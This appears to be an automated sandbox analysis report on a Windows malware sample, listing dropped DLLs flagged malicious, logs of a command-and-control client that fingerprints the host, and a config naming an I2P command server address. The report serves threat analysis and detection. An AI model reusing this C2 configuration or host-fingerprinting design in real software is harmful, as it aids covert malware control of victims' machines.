                                  Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):999
                                  Entropy (8bit):4.966299883488245
                                  Encrypted:false
                                  SSDEEP:24:Jd4T7gw4TchTGBLtKEHcHGuDyeHRuDye6MGFiP6euDyRtz:34T53VGLv8HGuDyeHRuDye6MGFiP6euy
                                  MD5:24567B9212F806F6E3E27CDEB07728C0
                                  SHA1:371AE77042FFF52327BF4B929495D5603404107D
                                  SHA-256:82F352AD3C9B3E58ECD3207EDC38D5F01B14D968DA908406BD60FD93230B69F6
                                  SHA-512:5D5E65FCD9061DADC760C9B3124547F2BABEB49FD56A2FD2FE2AD2211A1CB15436DB24308A0B5A87DA24EC6AB2A9B0C5242D828BE85BD1B2683F9468CE310904
                                  Malicious:false
                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<software_identification_tag xmlns="http://standards.iso.org/iso/19770/-2/2009/schema.xsd">...<entitlement_required_indicator>true</entitlement_required_indicator>...<product_title>Windows 10 Pro</product_title>...<product_version>....<name>10.0.19041.1865</name>....<numeric>.....<major>10</major>.....<minor>0</minor>.....<build>19041</build>.....<review>1865</review>....</numeric>...</product_version>...<software_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_creator>...<software_licensor>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</software_licensor>...<software_id>....<unique_id>Windows-10-Pro</unique_id>....<tag_creator_regid>regid.1991-06.com.microsoft</tag_creator_regid>...</software_id>...<tag_creator>....<name>Microsoft Corporation</name>....<regid>regid.1991-06.com.microsoft</regid>...</tag_creator>..</software_identification_tag>..
                                  Process:C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):456
                                  Entropy (8bit):3.2341395630162877
                                  Encrypted:false
                                  SSDEEP:12:Ml8Pi7t8+d/fQfjfEWNfElsfghFfShFfgmSem4emzYWr:k8APd/oj8i8ls0FSFgID7r
                                  MD5:40AB00517F4227F2C3C334F1D16B65B4
                                  SHA1:F8D57AF017E2209B4FB24122647FD7F71B67C87C
                                  SHA-256:4BAF4B78D05A28AF7DEE7DBBCE2B4EDF6053D9239C1756C932BE9F2FEEE4EF85
                                  SHA-512:75D74306F043B864295F09A60C19A43494C226664733C99318989CE5C22CB9395BB407FB5C8C0268AD9184A79813304ED5FC943A6B53DB54F5F225CDA31650E3
                                  Malicious:false
                                  Preview:C.o.m.p.u.t.e.r...{.2.0.d.0.4.f.e.0.-.3.a.e.a.-.1.0.6.9.-.a.2.d.8.-.0.8.0.0.2.b.3.0.3.0.9.d.}.....D.:.A.I.(.D.;.;.F.A.;.;.;.B.U.).(.A.;.;.F.A.;.;.;.B.A.).(.A.;.O.I.C.I.I.D.;.F.A.;.;.;.B.A.).(.A.;.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.C.O.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.I.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.-.1.-.5.-.3.).....
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):115200
                                  Entropy (8bit):6.220212606349767
                                  Encrypted:false
                                  SSDEEP:1536:GQTj0nA3CwwEWLUbltMR8tGZ9G+Yv953a6nfgXqobk5l:GQP02C7LUbltdQG+Yra64Xqo45l
                                  MD5:BE6174AE2B452DA9D00F9C7C4D8A675B
                                  SHA1:0ABD2C76C82416AE9C30124C43802E2E49C8ED28
                                  SHA-256:A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
                                  SHA-512:5631B1595F8CEE8C0DFA991852259FEE17EA8B73A9EED900A10450BBB7C846ACFC88C32930BE379D60EFA6AE1BBBEAD0A605A9F36E20129B53BCA36B13BA5858
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: file.exe, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):2847
                                  Entropy (8bit):5.5631076386293214
                                  Encrypted:false
                                  SSDEEP:48:CFdHW54yclD7hcm9FLZ4WU4bcPPu4bcPPTM94bcPPZ4bcPPA4bcPPL4bcPPcWIea:idH9NdJ9Vj3YPpYPTNYP6YPTYPcYPVPi
                                  MD5:C41CE339E2210FB9B0BF8195FE9990BF
                                  SHA1:4E20FCF72ECB77ED3658A1C62B1A03113E3D3705
                                  SHA-256:999CAB392C55F248FC97A09390BC311C9667FE836D063BEB1289414BB57AA27A
                                  SHA-512:B811141CF861B95B392E896E96A14CFBCB8BDCEC566DFBF7EFB548BBF5402BF99A136AB55CD845B6CCEB5264F9EFAAEE4C95FA4DA0C22C525C62C36D88230AC5
                                  Malicious:false
                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffb2ce30000)..[D] (module_get_proc) -> Done(hnd=0x00007ffb2ce30000,name=RtlGetVersion,ret=0x00007ffb2ce6e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=39014b7a)..[I] (sys_init) -> Done(sys_uid=c76a8f0839014b7a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[D] (ini_get_sec) -> Done(name=cnccli)..[D] (ini_get_var) -> Done(sec=cnccli,name=server_host,value=c
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:Generic INItialization configuration [cnccli]
                                  Category:dropped
                                  Size (bytes):214
                                  Entropy (8bit):5.0997449470012635
                                  Encrypted:false
                                  SSDEEP:6:1EVQLD4oeMuJO+70X1YIzODSVkXpTRL9gWVUDeLn:CjogJO+70X1YeCS2X9vgpKL
                                  MD5:26702FAAB91B6B144715714A96728F39
                                  SHA1:CBDC34FC8FD3559CD49475FB5BC76176A5F88FF8
                                  SHA-256:83D30846DD5576DE38A512B17163419D22FF35F2F5B0FE613C401E8A5A25B7A4
                                  SHA-512:50D35D3DCD60B6E57C1A277E6C3E7AFBB5C2B46425732FC5A9FD3C0A55FEBF5AB3F05411A83CEC230AAC40199774FF78F30848D57D1E04A11B9E60777B038289
                                  Malicious:false
                                  Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=c21a8709..server_port=41674..server_timeo=15000..i2p_try_num=10..i2p_sam3_timeo=30000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):104448
                                  Entropy (8bit):6.259370376612282
                                  Encrypted:false
                                  SSDEEP:1536:VQbC3TviBZTprAFnfkRAJhzTjvlsy2nD+cRi6ZQOobsAx34:VGC3TKBZTWJfImTjx2D+ei6ZQOkx34
                                  MD5:7A8E8A0842D8D65713DEE5393E806755
                                  SHA1:AF6F3A52009FBF62C21A290EFC34A94C151B683E
                                  SHA-256:51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
                                  SHA-512:D1B8D93B7EFBEAA348D3A01293AD5D92BC8F28EB2554DF5E6E71506D00D135390082C52C18D0BC3F0439B068777D8B2C43AAED930C72E5FFAB2593EEAC470CF4
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: file.exe, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\.........?..............................0............`... .........................................^.......................$............ ..l............................v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1021
                                  Entropy (8bit):5.446262796592905
                                  Encrypted:false
                                  SSDEEP:24:CFAGHS+5lGyclY7GfyE7Bf7cRE9FLxJN4Jw0ERYSXY+e:CFdHS+54yclD7hcm9FLZ4WX0
                                  MD5:3F3942419DA6A3A4B7F012F7195E68B1
                                  SHA1:2FD2223C796D4B4041016985863C02003619B7BA
                                  SHA-256:B45ABC2AAB871B3B330C99526750ABAAD3DF8B2C5684890D1B808E8258174568
                                  SHA-512:4D0516CFACEE777259E5E73B9790B23291D49983B155572E893F4C2B162FE0FDE073E710E415C1135CA81FD61E7A0B7E8F2DC6A6A982EBB19850D885DF5D9605
                                  Malicious:false
                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffb2ce30000)..[D] (module_get_proc) -> Done(hnd=0x00007ffb2ce30000,name=RtlGetVersion,ret=0x00007ffb2ce6e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=39014b7a)..[I] (sys_init) -> Done(sys_uid=c76a8f0839014b7a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffb23adb070)..[I] (tcp_connect) -> Done(sock=0x328,host=7
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):92672
                                  Entropy (8bit):6.242846530333761
                                  Encrypted:false
                                  SSDEEP:1536:Eb84+EBwpVmTx3sJg0jsEv5YqKnbGGOO5YhNDE:Eb84+EB7x3sJXwExKb/OOv
                                  MD5:FDCF93ACD089B505B524DDFA0FF947F9
                                  SHA1:A2BADA5807BA001758DBCE46DA634332A5CC14C2
                                  SHA-256:ADFE373F98CABF338577963DCEA279103C19FF04B1742DC748B9477DC0156BB4
                                  SHA-512:110455DC5C3F090A1341EE6D09D9B327CD03999C70D4A2C0B762B91BC334B0448E750CB1FD7B34CE729B8E1CD33B55A4E1FA1187586C2FF8850B2FD907AFE03E
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: file.exe, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....f......\.........Io....................................C.....`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):5334
                                  Entropy (8bit):5.400932112557523
                                  Encrypted:false
                                  SSDEEP:48:CFdHs54yclD7hcm9FLZ4WzBMwP/CEB8jVEmjsE9jwE97UWETek:idHrNdJ9VjzBpCEKEJEiEtEl
                                  MD5:63B446C4090EE74115BD9EFEA27AB090
                                  SHA1:72C2E9AA3E5C86C63EE105CB44D5339143F140BD
                                  SHA-256:BE52C8CF9CCB044B32A352C3ADFA4A9F2861AF187892DF92C8D3E867FC9359A2
                                  SHA-512:2EAB6DE83AACC2122B3CDDA2C13BA0BD02DD8BD2FBB61792A2C9B41200FA377AAC6DCC952CAD37075D79A8737A061973D890678E90348B61B5FBF95B2C2BB501
                                  Malicious:false
                                  Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffb2ce30000)..[D] (module_get_proc) -> Done(hnd=0x00007ffb2ce30000,name=RtlGetVersion,ret=0x00007ffb2ce6e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=39014b7a)..[I] (sys_init) -> Done(sys_uid=c76a8f0839014b7a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (server_init) -> CreateThread(routine_gc) done..[I] (server_init) -> CreateThread(routine_accept) done..[I] (server_init)
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):8568
                                  Entropy (8bit):4.958673415285098
                                  Encrypted:false
                                  SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                                  MD5:27535CEE6740DFC50A78A0322415E67C
                                  SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                                  SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                                  SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                                  Malicious:false
                                  Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):62449
                                  Entropy (8bit):7.807149241969407
                                  Encrypted:false
                                  SSDEEP:1536:uzSVMhnCwJEZ4dJ4douBYaGGIW2QzPzp343mR:vKE29uBFBo2R
                                  MD5:688FDFAE15F328A84E8F19F8F4193AF2
                                  SHA1:C65D4CDA0C93B84154DFBC065AE78B9E2F7ECFA8
                                  SHA-256:8D37FF2458FDE376A41E9E702A9049FF89E78B75669C0F681CFCAFBA9D49688E
                                  SHA-512:F19BC7F204DBE3449ABE9494BFFF8BE632F20F1B4B8272F0AF71C4CEC344A20617C0909C024CB4A4E0C6B266D386CB127554DC70F3A6AA7A81DAF1A8748F5D2D
                                  Malicious:false
                                  Preview:I2Psu3.................................1726476901......reseed@cnc.netPK.........E0Y.L.`........;...routerInfo-CVE7qh1P~hZ~PX2FDY6wRTmrdDd1eQ5Nv7yBC0EcH-o=.dat.^...)....?E4T{w...U........5.x.Z*T.v...C..~m.....r.u.._..0*._>a....B.......1in..o...R...M.....2.0..1...?.&..1@.._.s....KrbA.-..5c..Nzvep.KU.s.n...Gy.E.y...GU.c..A.i.[HU..{I@v..5c.-..53....5..f Kpp..c....:.N..I..u..~~..u....%a........~F>.&.9..I..........\..Ff&..f...!CL!#.!....[.3..:.......J....:..DO...B.l.\gc....r...P__W[..C[......_.d#wG.t....ts.rG. .R.@...b....*c..t..#[...l......D.....<.0...B. ].4...P....(...J...>2.02243....}dll`aan`bj...................%...F..~Q......>....If.a..%..!...E......@...BD...d:..!.b'sDZ.5k^j.g.H\..JI..../..IM,N.N-.:..Z.I"(..$............+..e.....Y..[_...U....t.....n8CEbM...k.%W.^....`i..&[.Y.{}...d.Vn.g..0...PK.........>0Y....:.......;...routerInfo-7xGNdz1Bi17~K7q9lFTjGVPnQdN0tqNJ-xpZt5MSp1Q=.dat{lr...~./..<Yw_...".....%..E.....O..l.(.R<K^...>.i..{.D.s-.+...
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):512
                                  Entropy (8bit):7.584283083217091
                                  Encrypted:false
                                  SSDEEP:12:Tx3MlWzRw3o8KDV7O1cph8XQlYKrfqmMjYN4KIaGMswGTqjhKt:T6lWVwwicp9lYKGmaYN4KIaNsHwKt
                                  MD5:5A69BF992B2C1A1656506371A4CC0B7E
                                  SHA1:8AE7F521F01985F8DC090BBF5ABC929D16BB4363
                                  SHA-256:353D3210A98889339D16BED1C3B4CBB743E3C2E8141A8712FBD1B74ABB34E055
                                  SHA-512:E3DE4ECCD9A6AF8AA0203D9447DDBA5728822DB2E93C5E3B8AA889B2066741DA5B12D88A6232F471F4339C350A39B8A3251311DFC6987843CD765979FA189ED0
                                  Malicious:false
                                  Preview:Oms..U..j..a..u.[=........O.".7.Q.....3...........N.{sR....8e.lo.Q.1.2\'c.B.....9ydQ.&..L..._.......;.S..}-o=..KG.S..DX8t.Np..Z...=4.7k.K.....^..R.d..6../..3H .\MP-.~....\.Y%.........B.0.e.(..|..s..V...P..f..,.8vON...A.:..Y|..d.].. U.....5z...R........drfG^...`.8.......4.8.....A...OA.#__..O.5r.n.....tgZY......<...R.(".'.E&$EI.n..].......yPP./3...d@..h...N9...o..-..'j...^GG...(5..Q[.`...j.BF....%..<..m..X...d._.<p.B=...........;...........O..q.....Q..@i.DjH:..?.s....6.\..
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):512
                                  Entropy (8bit):7.555565848052564
                                  Encrypted:false
                                  SSDEEP:12:8m/WOcPTN/sdcI5uss9bHuACCe8oz7DcV6HmYNudwVf3y://AbN/EcI5usIhxy7DNHZudwZi
                                  MD5:082807612529539441959F0CFD84D3CE
                                  SHA1:D4D3192712095C518EB6AFD1EDF18F21BE012B4C
                                  SHA-256:2B6576102ACE0DC16FECD966670E5F13CB2971AA8643D94A2D7270B116CD8E64
                                  SHA-512:AC2B28F18C8F7F68F0D02DA6B9E6C9C8DDE57417A40FAE74D0E6DE40AB5F96BEDC304DD15D540E3106588E41C5F6113ACB4751A4CF071C5C35FE769992A8F680
                                  Malicious:false
                                  Preview:..j.W.?'a|+l.Ar. S.?.H.u-.-........%...Gy.=m.Z5...T%w...F0&eF...0<4...f.`x#............c...<....Z.a(}..O.g.u^v.ges.i..]........!....#.+...^...<.Qv..L.$(D...W...d=_...?\.O...9.B..4..kd`jj....d.S..:n..N..M.>.>.*...|fR.D.,.m...W.&.F.\#....8 .......(@...2TL..D.$....)c.z...kXJ..}|...z<...J..E..Rw..!.A..c.6Ig.$...$.l..]H..._..C.l.8.^.j.7..9.W..@0.....=.A....;...P..0?..B.e.A......{K...(rG..7c.? ...=........=.3...-...{h>Us.<.A.}..a.i.F.3.......2.Z?o...7.u..jWF#...H_..ntd...^....EkU|...
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):512
                                  Entropy (8bit):7.51647207377326
                                  Encrypted:false
                                  SSDEEP:12:gzWYO4eG81cPe+SxyWHEl5VJEeWEBKxlEs+Ylif:g6YOD1cVS7khJ/PKTEs+5f
                                  MD5:A439CB069ACC06F874268D1BDD6DDB3E
                                  SHA1:54DB59556B5FAF66DCDA321405574D5405541286
                                  SHA-256:E8F4FD6B41CB61331E957402EC52C9844ACFC40D69FC8F14D5408745E0C9E0FE
                                  SHA-512:A25BFB59428E594613F1046603B153932FC8B8C455B89AC22CFA1FCA07F12683AB4B420AB7F28B349EBC33EF484D27A54A63C4426FF057A401A80510FEE3AFCB
                                  Malicious:false
                                  Preview:d.ie..IZ.I.\.3N.8........%.I^..uf..CvX.<.B.k.z.0...ut?.`H.h.+..Kc.lL}..JPC`.).-....3qX..........'Qr...Z.I.L=.*.@.<....@.]..8..n|a..2.]j...D.$f.....].W....<t.....d]^..dK...)......tV..[V..t.l....^..k.1<|r.u.^Ly8.w.....{.....s.........g.>.l.5..Z1E.B0..?UL.........#y.N..4Jj..@.D.....s...>....r.$..u7.//...w......yE7+.{:....^..........Xk.q=.s.W.@..........?-..a.)=....l.s...BB.{.zZ....[Go...m........1Z......#..Sj.1.....O..p4...E....<.Bs...l..z...5.j.3......x.Z.\#...L..v..<.O....(...[.8..Z.
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):512
                                  Entropy (8bit):7.599441616503169
                                  Encrypted:false
                                  SSDEEP:12:IWoJ1Rf/wZ5EUbkmJKtrByzIb8RMIq0BkdFbPvY7qGQZH2dJHg:IBydbkmJKtdTOPqakdFbPg7qGqHEJHg
                                  MD5:98118FD2508207878C22CE888A954EC4
                                  SHA1:C3497EEB2455EB61D5AA1959A0C583BED05FFDD0
                                  SHA-256:6E2B5D179F325329DCA4D55D261DAE4406DE7CF71CAB84FD730B35FB1FE33B3C
                                  SHA-512:2DBEB9B8F5C39AEBE59F77DEF6C1D85C36FF3952B7493BD2A0371376F915E1756F7DF99CEC9410F4601E7D504CE20940C3C6DE54CC139EC32BDB407F360FFE51
                                  Malicious:false
                                  Preview:.{.:...&.S]..s.7.....p.$...e...qY|.AH.:.V.2D.x=4N.....p...#...e...)L...P.M.....cn......*Bf...{2..../..I3b.../.J.+...l...._r...M.L.`..!!...{....8.#x..tWp.]...&.1'...-.....@.#..".=r5[.h.."...6......v...D...3A.>.,.y...'Z8.j3.P.u9...7.V>..w.e.$...p{..W.....P.o....N......O2.....q.....s./.v6...P7Y..E4j.k..?.....A.PJ\......4.....'. ..Z......Q...N..}..U.j......_. ..=p}/la.c....q.QM......'.<5.........Z..D~.<o.........`...-..[..X. .9D...DA.pkzf......S.LL.7Y....L..1.=..{...S,1.6Z&...8..X$....
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):80
                                  Entropy (8bit):6.1374920011103145
                                  Encrypted:false
                                  SSDEEP:3:aTOlWr1R0TOqNYT83PdKVtFfFOBz:aTOlWhR0BNYYoHlFuz
                                  MD5:7E643A1E79807DEC9A6F435244F2F9EE
                                  SHA1:ACFDB9C7509E9780153BB974C4E2DFEB1A4D0CB0
                                  SHA-256:9DE7F51DBFC362ADF812CC375FFE8FAC3C5A86BBA642D52243E9448367E6AF65
                                  SHA-512:CD7E72BD0678305062E84102223B92D643B670FC8CCC9F57DC375FC5383C6CF8564A5D512FBE9C256063F30B5792020D7FE25E9D0E92502796CC808F9A938DF7
                                  Malicious:false
                                  Preview:....=B...C..\.Rn.......]&.......Z.G...ijaN....|...9.<._.&.z..qF.3V..-..t.$.
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):804
                                  Entropy (8bit):6.595283826963492
                                  Encrypted:false
                                  SSDEEP:24:TV3CV3CV3CV3CV3CV3CV3CV3CV3CV3exD97bnqI73WHn:9xbndrWH
                                  MD5:5CB538588D133C69210A503B9C8F4031
                                  SHA1:6706378F1DF214BA74672880AC3A9F38041AB9B5
                                  SHA-256:3101EEE0B514EF0A87F6F5D85BC62F49C1ACC37567C12456BC8C7A2653EDF49F
                                  SHA-512:DD8594516A84A7FD07852D789FFFFFD686079496CFA61A160BDD42E14C19F08628FEA48461D9337EE9981F509D773031E30A13341CB84B7AC1A1C51E25F9D278
                                  Malicious:false
                                  Preview:lJ...&.R.j.?gY...u........4w.....)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_..)-b..-U{o..S-{...w_\hI;_...d_ZC..^..q...F.......P..~kn4...9...........&O.............NTCP2.s.host=.8.46.123.33;.i=.sbpxRoszVoOILboCdBwklg==;.port=.9290;.s=,suCQGj1C2v6EQx6YXMxSbgnejtCGiNG7GrNdJo~79AE=;.v=.2;..........SSU2...caps=.BC;.host=.8.46.123.33;.i=,SQJAXjEGt~KRAvnX~UCYtPV1r4XBu5giXYjffalVtM0=;.port=.9290;.s=,lBPMe0pRAMO786cBQ~yWslh-egtgWG~I~OKMHvjdB18=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.60;......hfA....".\;.....zd!...H..[.Hj..H[.r.BD...XI.p.......z..
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):455
                                  Entropy (8bit):6.030445476463723
                                  Encrypted:false
